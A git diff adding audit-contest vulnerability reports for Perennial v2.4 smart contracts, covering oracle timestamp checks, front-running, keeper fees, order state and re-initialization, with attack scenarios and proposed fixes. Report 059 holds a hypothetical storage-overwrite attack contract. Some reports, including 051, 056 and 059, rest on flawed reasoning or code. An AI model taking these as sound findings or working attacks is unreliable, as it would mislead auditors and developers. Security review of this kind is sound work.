+``` + +Position adjustments execute using outdated data, potentially leading to suboptimal collateral utilization and increased liquidation risk. + +## Fix +Implement a multi-layered timestamp validation: +```solidity +// Staleness check +if (block.timestamp - oracleVersion.timestamp > MAX_STALENESS) revert StaleOracleError(); + +// Deviation boundary +uint256 maxDiff = timestamps[i] > timestamps[j] ? 
timestamps[i] - timestamps[j] : timestamps[j] - timestamps[i]; +if (maxDiff > MAX_TIMESTAMP_DEVIATION) revert TimestampDeviationError(); + +// Median selection +function getMedianTimestamp(uint256[] memory timestamps) private pure returns (uint256) { + // Sort and select median + return sortedTimestamps[timestamps.length / 2]; +} +``` + +This approach enforces freshness guarantees while maintaining cross-market synchronization boundaries, significantly reducing the attack surface for oracle manipulation and settlement gaming strategies. \ No newline at end of file diff --git a/051.md b/051.md new file mode 100644 index 0000000..5cff6e2 --- /dev/null +++ b/051.md @@ -0,0 +1,30 @@ +Cheerful Taffy Dolphin + +Medium + +# Strict Oracle Timestamp Equality Check Triggers Unnecessary VaultCurrentOutOfSyncError Due to Network Latency + +## Summary +The Vault contract implements strict timestamp equality checks to ensure synchronized oracle data across all registered markets. While synchronization is necessary for security, the current implementation's rigid requirements create operational challenges in real-world distributed environments. This analysis examines how excessive timestamp matching requirements lead to system failures and proposes architectural improvements to balance security with operational reliability. + +The vulnerability arises from an overly rigid timestamp equality check in the vault's `_loadContext` function: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L512 + +```solidity +if (context.currentTimestamp == type(uint256).max) context.currentTimestamp = currentTimestamp; +else if (currentTimestamp != context.currentTimestamp) revert VaultCurrentOutOfSyncError(); +``` + +This implementation requires exact timestamp matching across all oracle status calls. 
When processing oracle data through `registration.market.oracle().status()`, even minimal timestamp variations trigger a `VaultCurrentOutOfSyncError`, halting vault operations. + +The issue manifests in distributed oracle networks where update propagation isn't instantaneous. Consider a scenario where Market A receives an oracle update at t=1000000 and Market B at t=1000001 - a mere 1ms difference causes the entire transaction to revert. This strict synchronization requirement fails to account for inherent network latency and blockchain-specific timing variations. + +The problem compounds in cross-chain environments where clock drift becomes inevitable: +```solidity +(OracleVersion memory oracleVersion, uint256 currentTimestamp) = registration.market.oracle().status(); +``` +Each oracle call may encounter slightly different network conditions or blockchain timestamps, creating race conditions during near-simultaneous updates. The first oracle sets `currentTimestamp`, but subsequent reads within the same block may capture newer timestamps, forcing unnecessary reverts despite prices being current and valid. + +## Fix +Incorporate timestamp tolerance. \ No newline at end of file diff --git a/052.md b/052.md new file mode 100644 index 0000000..82bbf07 --- /dev/null +++ b/052.md @@ -0,0 +1,96 @@ +Cheerful Taffy Dolphin + +High + +# Missing Execution Rights Validation in _cancelOrder() Enables Front-Running of Signed Cancel Orders and Market Manipulation + +## Summary +The protocol implements two cancellation paths: direct cancellation and signature-based cancellation, utilizing EIP712 signatures for off-chain authorization. The Manager contract coordinates with an OrderVerifier for signature validation and a MarketFactory for operator permissions. A security review of this system reveals a significant authorization vulnerability in the order cancellation flow. + +The issue stems from the dual authorization paths in the order cancellation system. 
In the Manager contract, direct cancellations flow through: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L112 + +```solidity +function cancelOrder(IMarket market, uint256 orderId) external { + _cancelOrder(market, msg.sender, orderId); +} +``` + +This path implicitly ensures authorization as the `account` parameter passed to `_cancelOrder` is `msg.sender`. However, in the signature-based path: + +```solidity +function cancelOrderWithSignature(CancelOrderAction calldata request, bytes calldata signature) + external + keepAction(request.action, abi.encode(request, signature)) +{ + verifier.verifyCancelOrder(request, signature); + _cancelOrder(request.action.market, request.action.common.account, request.action.orderId); +} +``` + +it delegates authorization to the OrderVerifier contract, which validates through EIP712 signatures: + +```solidity +function _verifySignature(Action calldata action, bytes32 hash, bytes calldata signature) internal view { + if (!SignatureChecker.isValidSignatureNow( + action.common.signer, + _hashTypedDataV4(hash), + signature + )) revert VerifierInvalidSignerError(); +} +``` + +The authorization check in OrderVerifier only validates that the signer is authorized: + +```solidity +function _authorized(address account, address signer) internal view override returns (bool) { + return super._authorized(account, signer) || marketFactory.signers(account, signer); +} +``` + +The critical vulnerability lies in `_cancelOrder` lacking execution authorization: + +```solidity +function _cancelOrder(IMarket market, address account, uint256 orderId) private { + TriggerOrder memory order = _orders[market][account][orderId].read(); + if (order.isEmpty() || order.isSpent) revert ManagerCannotCancelError(); + order.isSpent = true; + _orders[market][account][orderId].store(order); + emit TriggerOrderCancelled(market, account, orderId); +} +``` + +This creates 
a security gap where anyone can execute a signed cancellation order. While the signature proves intent from an authorized signer, there's no validation of the executing party (`msg.sender`). This enables front-running attacks where malicious actors could execute signed cancellations before the intended executor. + +## Impact + +The authorization vulnerability in _cancelOrder has severe implications for the trigger order system's integrity. Any party can execute a signed cancel order without execution rights, enabling front-running of cancellations in volatile market conditions. Adversaries could manipulate the timing of order cancellations to their advantage, particularly damaging in a DeFi context where order execution sequence directly impacts profit/loss outcomes. Given that the Manager contract handles trigger orders for positions in trading markets, unauthorized control over cancellation timing could be exploited to manipulate market positions and force unfavorable execution conditions. 
+ +## Fix +The fix requires adding operator validation in `_cancelOrder`: + +```solidity +function _cancelOrder(IMarket market, address account, uint256 orderId) private { + if (msg.sender != account && !marketFactory.operators(account, msg.sender)) + revert ManagerNotOperatorError(); + + TriggerOrder memory order = _orders[market][account][orderId].read(); + if (order.isEmpty() || order.isSpent) revert ManagerCannotCancelError(); + order.isSpent = true; + _orders[market][account][orderId].store(order); + emit TriggerOrderCancelled(market, account, orderId); +} +``` + +This aligns with the contract's existing operator check pattern, seen in the claim function: + +```solidity +modifier onlyOperator(address account, address operator) { + if (account != operator && !marketFactory.operators(account, operator)) + revert ManagerNotOperatorError(); + _; +} +``` + +The vulnerability has significant implications for market operations, particularly during volatile conditions where order cancellation timing is critical. The fix establishes proper dual-layer authorization: signature validation for intent and operator validation for execution rights. \ No newline at end of file diff --git a/053.md b/053.md new file mode 100644 index 0000000..3147e2d --- /dev/null +++ b/053.md @@ -0,0 +1,66 @@ +Cheesy Pebble Kookaburra + +Medium + +# `Controller::withdrawWithSignature` may not work due to wrong assumption of 1 DSU = 1 USDC + +### Summary + +This issue was reported in a previous audit 2024 [here](https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-judging/issues/35) and also in a previous audit 2023 [here](https://github.com/sherlock-audit/2023-07-perennial-judging/issues/22). However, in the collateral `Account` the same issue still exists with assuming 1:1 unwrapping of `DSU` into `USDC` when `reserve.redeem(amount)` is called. 
+
+As a consequence, `Controller::withdrawWithSignature()` and `ControllerIncentivized::withdrawWithSignature()` may not work due to this issue.
+
+### Root Cause
+
+
+
+In `Account::withdraw()`, `USDC` may be [unwrapped](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Account.sol#L81) from `DSU` to facilitate withdrawal by calling `reserve.redeem(amount)` in Account.sol line 103.
+
+However, the redeem price may be below 1 in the reserve implementation:
+
+```solidity
+function redeemPrice() public view returns (UFixed18) {
+    // if overcollateralized, cap at 1:1 redemption / if undercollateralized, redeem pro-rata
+    return assets().unsafeDiv(dsu.totalSupply()).min(UFixed18Lib.ONE);
+}
+```
+
+`Account::withdraw()` then calls `USDC.push(owner, pushAmount)` with `pushAmount` being the `amount`. However, since unwrapping `DSU` to `USDC` may not result in a 1:1 conversion, this may revert when trying to send more `USDC` to the owner than the contract has.
+
+
+Code snippets:
+
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Controller.sol#L228
+
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Controller_Incentivized.sol#L165
+
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Account.sol#L75-L85
+
+### Internal Pre-conditions
+
+_No response_
+
+### External Pre-conditions
+
+_No response_
+
+### Attack Path
+
+_No response_
+
+### Impact
+
+`Controller::withdrawWithSignature()` and `ControllerIncentivized::withdrawWithSignature()` may not work due to this issue.
+ +### PoC + +_No response_ + +### Mitigation + +Consider adjusting `Account::withdraw()` to transfer the difference between balance before and balance after, similar as in MultiInvoker.sol line 398: + +```solidity +// Account::withdraw() +83 UFixed6 pushAmount = amount.eq(UFixed6Lib.MAX) ? USDC.balanceOf() : USDC.balanceOf().sub(usdcBalance); +``` \ No newline at end of file diff --git a/054.md b/054.md new file mode 100644 index 0000000..d28a200 --- /dev/null +++ b/054.md @@ -0,0 +1,92 @@ +Clean Hemp Barracuda + +Medium + +# Inaccurate Keeper Fee in Order Execution + +### Summary + +The applicableGas is 0, and the KeepConfig has multiplier Base set to 0. This means the fee calculation would be (0 + bufferBase) * gasPrice, which ignores the actual gas used. + +Therefore, the _executeOrder function has the issue, where keeper fees aren't accurately calculated based on real gas consumption. This would lead to keepers being underpaid and potentially refusing to execute orders, harming protocol functionality. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/MultiInvoker/MultiInvoker.sol#L433 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/MultiInvoker/MultiInvoker.sol#L438 + + + +### Root Cause + +The `_executeOrder` function in the `MultiInvoker` contract miscalculates keeper fees by **hardcoding `applicableGas = 0`**, bypassing actual gas usage tracking. This leads to fees that do not reflect real transaction costs. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +**Scenario**: +1. User Action: Alice places a trigger order with a `fee = 10 DSU`. +2. Keeper Exec: Bob calls `_executeOrder`, spending **80,000 gas**. +3. **Fee Calculation**: + - `applicableGas` is **0** (hardcoded). 
+ - `fee = (0 + keepBufferBase) * gasPrice = (0 + 10,000) * 20 gwei = 0.0002 ETH` (converted to DSU). + - Actual cost: **80,000 gas * 20 gwei = 0.0016 ETH**. +4. Outcome: + - Keeper receives **0.0002 ETH** but spent **0.0016 ETH**. + - **Loss**: 0.0014 ETH per transaction. Keepers stop executing orders over time. + +**Code Reference**: +```solidity +function _executeOrder(...) internal { + _handleKeeperFee( + KeepConfig( + UFixed18Lib.ZERO, // multiplierBase = 0 + keepBufferBase, // e.g., 10,000 gas + UFixed18Lib.ZERO, + keepBufferCalldata + ), + 0, // ❌ Hardcoded `applicableGas = 0` + msg.data[0:0], + 0, + abi.encode(...) + ); +} +``` + +### Impact + +- **Underpaid Keepers**: Fees are based on static buffers (e.g., `keepBufferBase`) instead of real gas usage, causing financial losses for keepers. +- **Protocol Dysfunction**: Persistent underpayment disincentivizes keepers from executing orders, leading to unprocessed orders and user frustration. + +### PoC + +_No response_ + +### Mitigation + +1. **Track Gas Usage**: Measure `gasleft()` before and after order execution. +2. **Pass Actual Gas**: Use the difference to calculate fees. + +**Fixed Code**: +```solidity +function _executeOrder(...) internal { + uint256 startGas = gasleft(); // ✅ Capture initial gas + + // ... execute order logic ... + + uint256 gasUsed = startGas - gasleft(); // ✅ Calculate actual gas + _handleKeeperFee( + KeepConfig(...), + gasUsed, // ✅ Pass real gas usage + msg.data[0:0], + 0, + abi.encode(...) + ); +} +``` \ No newline at end of file diff --git a/055.md b/055.md new file mode 100644 index 0000000..fbdca31 --- /dev/null +++ b/055.md @@ -0,0 +1,78 @@ +Clean Hemp Barracuda + +Medium + +# Incomplete Gas Tracking in Order Execution + +### Summary + +The `executeOrder` function in the `Manager` contract miscalculates keeper fees by excluding the gas consumed during the fee handling process itself. 
This results in undercompensation for keepers, as the fee calculation does not account for the entire gas usage of the transaction.
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L145
+
+### Root Cause
+
+The `applicableGas` is `startGas` (captured before the order execution) minus `gasleft()` after the order execution but before the keeper fee handling. So the gas used for the order execution is captured, but the gas used for the keeper fee handling itself is not included. However, the keeper fee handling is part of the transaction, so the fee should cover the entire gas used, including the
+`_handleKeeperFee` logic.
+
+But in the current code, `applicableGas` does not include the gas used by `_handleKeeperFee`. This could lead to underpayment because the keeper's gas cost includes the fee handling, but the fee calculation doesn't account for it.
+
+For example:
+1. The keeper calls `executeOrder`; the gas used for executing the order is 80,000.
+2. Then, `applicableGas` is 80,000, and the fee is calculated based on that.
+3. But the `_handleKeeperFee` function itself consumes gas (e.g., 20,000), so the total gas used is 100,000. However, the keeper is only compensated for 80,000, leading to a loss.
+
+This is a flaw because the keeper's total gas usage includes the fee handling, but the fee calculation doesn't include it.
+
+This would result in the keeper being undercompensated for the full gas cost of the transaction, including the fee handling logic.
+
+The fix would be to measure the gas used after all operations, including `_handleKeeperFee`. However, in the current code, `applicableGas` is calculated before calling `_handleKeeperFee`, so the gas used by `_handleKeeperFee` is not included.
+
+### Internal Pre-conditions
+
+_No response_
+
+### External Pre-conditions
+
+_No response_
+
+### Attack Path
+
+**Scenario**:
+1. 
**Keeper Action**: Bob executes an order, consuming **80,000 gas** for order logic and **20,000 gas** for fee handling. +2. **Fee Calculation**: + - `applicableGas = 80,000` (order logic only). + - `fee = (80,000 + buffer) * gasPrice`. +3. **Outcome**: + - Keeper is paid for **80,000 gas** but spent **100,000 gas** (total transaction). + - **Loss**: 20,000 gas per transaction. Keepers stop executing orders over time. + +**Code Reference**: +```solidity +function executeOrder(...) external { + uint256 startGas = gasleft(); + // ... order execution logic ... + uint256 applicableGas = startGas - gasleft(); // Measures gas used by order logic only + _handleKeeperFee(...); // Additional gas used here is not tracked +} +``` + +### Impact + +- **Underpaid Keepers**: Keepers incur gas costs for both executing the order and processing the fee, but are only reimbursed for the former. This leads to financial losses for keepers. +- **Protocol Dysfunction**: Persistent underpayment discourages keepers from executing orders, causing order backlog and degraded user experience. + +### PoC + +_No response_ + +### Mitigation + +1. **Measure Total Gas**: Calculate `applicableGas` after all logic, including fee handling. +2. **Adjust Gas Tracking**: + ```solidity + uint256 startGas = gasleft(); + // ... order execution and fee handling logic ... + uint256 totalGasUsed = startGas - gasleft(); + _handleKeeperFee(..., totalGasUsed, ...); + ``` +3. **Note**: This requires restructuring to ensure `_handleKeeperFee` is included in gas measurement. \ No newline at end of file diff --git a/056.md b/056.md new file mode 100644 index 0000000..4a20075 --- /dev/null +++ b/056.md @@ -0,0 +1,54 @@ +Clean Hemp Barracuda + +Medium + +# Front-Runnable `maxFee` Reduction + +### Summary + +Users can reduce the `maxFee` of an existing order, creating a race condition where keepers may execute orders at lower fees than initially promised. + +point is the placeOrder function. 
It allows updating an order with a lower maxFee, which might let users reduce fees after keepers have already committed gas. This creates a race +condition where keepers might not get paid adequately, leading to potential +losses. + +### Root Cause + + +**Code Reference**: +```solidity +function _placeOrder(...) private { + if (!old.isEmpty() && old.maxFee.gt(order.maxFee)) + revert ManagerCannotReduceMaxFee(); // ❌ Only prevents reducing maxFee, not front-running +} +``` + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +**Scenario**: +1. **User Action**: Alice places an order with `maxFee = 10 DSU`. +2. **Keeper Sees Order**: Begins processing, expecting `10 DSU`. +3. **User Front-Runs**: Updates order to `maxFee = 5 DSU`. +4. **Result**: Keeper receives `5 DSU` but spent gas based on `10 DSU`. + +### Impact + +- **Keeper Losses**: Keepers commit gas expecting a higher fee, but receive less after a user front-runs the transaction. +- **Protocol Trust**: Users can exploit this to underpay keepers, damaging protocol credibility. + +### PoC + +_No response_ + +### Mitigation + +- Enforce a minimum fee increase threshold (e.g., `newMaxFee ≥ oldMaxFee * 0.9`). +- Implement a time-delay for fee reductions. \ No newline at end of file diff --git a/057.md b/057.md new file mode 100644 index 0000000..8b9553c --- /dev/null +++ b/057.md @@ -0,0 +1,60 @@ +Clean Hemp Barracuda + +High + +# Irreversible Order State on Fee Handling Failure + +### Summary + +looking at the Manager `_raiseKeeper` Fee function, it uses controller. chargeFee to pull fees from the user's account. If chargeFee fails (e.g., insufficient funds), the entire transaction reverts. But the order is already marked as spent, so the user can't retry. This could lock funds permanently, which is a critical problem. 
+
+If `_raiseKeeperFee` fails (e.g., due to insufficient user funds), the order is marked as `isSpent = true`, but the fee is not charged. This permanently locks the order, preventing retries.
+
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L186
+
+### Root Cause
+
+
+**Code Reference**:
+```solidity
+function executeOrder(...) external {
+    // ... marks order as spent BEFORE fee handling ...
+    order.isSpent = true; // ❌ State changed before fee transfer
+    _handleKeeperFee(...); // May revert due to insufficient funds
+}
+```
+
+
+### Internal Pre-conditions
+
+_No response_
+
+### External Pre-conditions
+
+_No response_
+
+### Attack Path
+
+
+**Scenario**:
+1. **User Action**: Alice places an order with `maxFee = 5 DSU`.
+2. **Keeper Execution**: Bob spends gas to execute the order.
+3. **Failure**: Alice’s account has only `3 DSU`, causing `_raiseKeeperFee` to revert.
+4. **Result**: Order is marked `isSpent`, but Alice cannot retry.
+
+
+
+
+### Impact
+
+- **Funds Locked**: Users cannot retry failed orders, losing access to their collateral.
+- **Denial-of-Service**: Attackers can exploit this to lock legitimate users’ orders.
+
+### PoC
+
+_No response_
+
+### Mitigation
+
+- Mark orders as spent **after** successful fee handling.
+- Use a temporary state to track execution progress.
\ No newline at end of file
diff --git a/058.md b/058.md
new file mode 100644
index 0000000..355ea45
--- /dev/null
+++ b/058.md
@@ -0,0 +1,31 @@
+Jovial Ocean Elk
+
+High
+
+# Incorrect use of negative values in `maintained()` and `margined()` functions in `Position.sol`
+
+## Summary
+The `maintained()` and `margined()` functions wrongly handle negative collateral values, creating a path for undercollateralized positions to appear solvent.
+
+## Vulnerability Details
+```solidity
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Position.sol#L211-L217
+```
+```solidity
+https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Position.sol#L242-L250
+
+```
+In the `maintained()` and `margined()` functions,
+collateral is stored as `Fixed6`, which is signed, but is later converted to `UFixed6`, which is unsigned, using `UFixed6Lib.unsafeFrom(collateral)`.
+Negative values wrap around to a large set of numbers due to the two's complement representation (`-100` → `2^256 - 100`), which will cause the check to return true for negative collateral.
+
+## Impact
+Malicious users can maintain positions with negative collateral, bypassing solvency checks.
+Malicious actors can also borrow funds without posting collateral.
+
+
+## Tools Used
+Manual review.
+
+## Recommendations
+Revert or return false if collateral is negative, unless the position is empty.
diff --git a/059.md b/059.md new file mode 100644 index 0000000..5435f4d --- /dev/null +++ b/059.md @@ -0,0 +1,94 @@ +Noisy Quartz Bird + +High + +# Storage Manipulation Attack using `_version` in initialization process + +### Summary +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L120-L128 +```solidity +/// @dev The initialized flag + Uint256Storage private constant _version = Uint256Storage.wrap(keccak256("equilibria.root.Initializable.version")); + + /// @dev The initializing flag + BoolStorage private constant _initializing = BoolStorage.wrap(keccak256("equilibria.root.Initializable.initializing")); + + /// @dev Can only be called once per version, `version` is 1-indexed + modifier initializer(uint256 version) { + if (version == 0) revert InitializableZeroVersionError(); + if (_version.read() >= version) revert InitializableAlreadyInitializedError(version); + + _version.store(version); + _initializing.store(true); + + _; + + _initializing.store(false); + emit Initialized(version); + } +``` + `_version` is critical to upgrade security. +If it is reset, manipulated, or bypassed, an attacker can take over the contract via re-initialization or forced downgrades. +If `_version` is stored in an upgradeable proxy’s storage, an attacker could overwrite it and re-trigger `initialize()`, bypassing security. +This attack is a serious risk in upgradeable contracts. +Many real-world exploits involve storage overwrites, making `_version` a critical weakness. +https://solodit.cyfrin.io/issues/changing-_initializableslot-can-cause-_disableinitializers-to-actually-enable-initializers-spearbit-none-coinbase-solady-pdf + +### PoC +Since `_version` is used to track the initialization state, if an attacker finds a way to corrupt or reset _version, they can re-trigger initialize(). 
+ +Attack Steps +Find a Storage Collision or Overwrite `_version` + +If `_version` is stored in an upgradeable proxy contract, an attacker could override this slot by deploying a malicious contract that writes over the same storage index. +Example Attack Contract: +```solidity +contract StorageCorruptor { + function overwriteVersion(address target) public { + bytes32 slot = keccak256("equilibria.market.version"); // Hypothetical storage slot + assembly { + sstore(slot, 0) // Force `_version` back to 0 + } + IMarket(target).initialize(IMarket.MarketDefinition(...)); // Reinitialize! + } +} +``` +This forces `_version = 0`, bypassing the initializer(1) check. +Call `initialize()` Again + +After corrupting `_version`, the attacker calls initialize() again to replace the token and oracle with malicious versions. +Outcome +The attacker resets initialization. +They replace the token with a malicious ERC-20 that allows infinite minting. +They set oracle to a fake price feed, allowing market manipulation. +They drain all user funds by exploiting liquidity rules. + +### Recommendation +How to Fix This? +1. Store `_version` in an Immutable Contract +If `_version` is only stored in a proxy contract, it becomes easier to overwrite. +Moving `_version` into an immutable logic contract removes this attack vector. +Double-Lock Initialization with a Boolean Flag + +```solidity +bool private _isInitialized; +modifier initializer(uint256 version) { + require(!_isInitialized, "Already initialized"); + _isInitialized = true; + _; +} +``` +This prevents any form of re-initialization. +Use Explicit Storage Slots for Upgradeable Contracts + +Instead of keccak256("some string"), explicitly define storage slots to prevent overwrites. +2. Use a Hard Upgrade Lock +```solidity +require(_version == expectedVersion, "Version mismatch!"); +``` +Blocks reverting to older versions. + +3. 
Verify `_version` Before Upgrading +```solidity +require(proxyAdmin.getVersion() == latestVersion, "Cannot upgrade from old version"); +``` diff --git a/060.md b/060.md new file mode 100644 index 0000000..ceb1ced --- /dev/null +++ b/060.md @@ -0,0 +1,52 @@ +Cheesy Clay Dinosaur + +Medium + +# Front-Running Vulnerability in executeOrder() of Manager.sol + +### Summary + +In Manager.sol, inside executeOrder(), the order state (isSpent = true;) is updated after execution, allowing: + +**Front-running:** Attackers can monitor the mempool, execute the same order with higher gas fees, and get their transaction mined first. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L157-L163 + +### Root Cause + +_No response_ + +### Internal Pre-conditions + +1. A valid pending order exists for a market. +2. An attacker monitors the mempool for executeOrder() calls. +3. The contract does not enforce immediate invalidation (isSpent is set after execution). + +### External Pre-conditions + +1. Ethereum mempool must be publicly accessible, allowing attackers to see pending executeOrder() transactions. +2. MEV bots or attackers must have faster gas-adjusting strategies to submit transactions with higher gas. + +### Attack Path + +1. User submits a valid order execution: ```executeOrder(ETHMarket, Alice, 123);``` +2. Attacker detects the transaction in the mempool. +3. Attacker submits an identical transaction but with higher gas fees. ```executeOrder(ETHMarket, Alice, 123); // Attacker front-runs this order``` +4. The attacker's transaction is mined first, executing Alice’s order under their control. +5. Alice's original transaction gets mined later, failing due to order.isSpent = true;. + + +### Impact + +Users suffer losses due to manipulated execution prices. MEV bots or malicious actors gain unfair advantages over legitimate users. +Some examples of impact, +1. 
A stop-loss order is front-run, and the attacker buys at a lower price before it executes. +2. The user’s stop-loss gets triggered at a worse price, and the attacker sells at a profit. + +### PoC + +_No response_ + +### Mitigation + +_No response_ \ No newline at end of file diff --git a/061.md b/061.md new file mode 100644 index 0000000..9bfcc58 --- /dev/null +++ b/061.md @@ -0,0 +1,90 @@ +Dazzling Pastel Gibbon + +High + +# the “creating a new checkpoint” process + +When the contract calls _update(), which then invokes _checkpoint(context), it correctly generates an updated context.currentCheckpoint and stores it in _checkpoints[newId]. However, it never writes this new checkpoint’s ID back to the global state (context.global.current). + +As a result, the subsequent settlement logic (_settle())—which relies on iterating through context.global.current and context.global.latest—fails to detect the newly created checkpoint. This ultimately isolates the new checkpoint, making it impossible to be processed properly. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/vault/contracts/Vault.sol#L297 +Detailed Explanation of the Bug + +1. A new checkpoint is created but context.global.current is not updated +```solidity +function _checkpoint(Context memory context) private view { + // 1) Fetch the "current" context.global.current + context.currentId = context.global.current; + context.currentCheckpoint = _checkpoints[context.currentId].read(); + + // 2) If now > current checkpoint.timestamp, increment currentId + // and modify the new checkpoint in memory + if (context.currentTimestamp > context.currentCheckpoint.timestamp) { + context.currentId++; + context.currentCheckpoint.next(context.currentTimestamp, context.global); + } +} +``` + • Here, context.currentId may be incremented, but this change only happens locally. 
+ • The new context.currentId is never written back to context.global.current. + +2. The new checkpoint is stored, but context.global.current remains unchanged +```solidity +function _saveContext(Context memory context, address account) private { + if (account != address(0)) _accounts[account].store(context.local); + _accounts[address(0)].store(context.global); + + // The new checkpoint is stored in _checkpoints + _checkpoints[context.currentId].store(context.currentCheckpoint); + + // However, context.currentId is NOT written back to context.global.current + // This means the global "current" ID does not advance. +} +``` + • The contract correctly saves the new checkpoint in _checkpoints[...]. + • However, it never updates context.global.current, meaning the global state does not recognize that a new checkpoint was created. + +3. _settle() relies on context.global.current > context.global.latest to process new checkpoints +```solidity +while ( + context.global.current > context.global.latest && + ... +) { + // Only then does it proceed to call nextCheckpoint.complete(...) +} +``` + • _settle() only processes checkpoints that context.global.current acknowledges. + • Since context.global.current was never updated, _settle() never sees the newly created checkpoint. + • As a result, the settlement logic skips the new checkpoint, leaving it orphaned and preventing it from being finalized. + +Fixing the Issue + +A standard fix is to update _checkpoint() or _saveContext() so that the incremented context.currentId is written back to context.global.current. This ensures that the global state is aware of the newly created checkpoint. 
+ +Fixed Version of _checkpoint() and _saveContext() +```solidity +function _checkpoint(Context memory context) private view { + context.currentId = context.global.current; + context.currentCheckpoint = _checkpoints[context.currentId].read(); + + if (context.currentTimestamp > context.currentCheckpoint.timestamp) { + context.currentId++; + context.currentCheckpoint.next(context.currentTimestamp, context.global); + } +} + +function _saveContext(Context memory context, address account) private { + if (account != address(0)) _accounts[account].store(context.local); + + // FIX: Write context.currentId back to context.global.current + context.global.current = context.currentId; + _accounts[address(0)].store(context.global); + + _checkpoints[context.currentId].store(context.currentCheckpoint); +} +``` +Why This Fix Works + 1. The new checkpoint’s ID is now stored in context.global.current, making it globally recognized. + 2. _settle() can now detect the new checkpoint and process it correctly. + 3. The contract no longer leaves checkpoints orphaned and ensures proper settlement \ No newline at end of file diff --git a/invalid/.gitkeep b/invalid/.gitkeep new file mode 100644 index 0000000..e69de29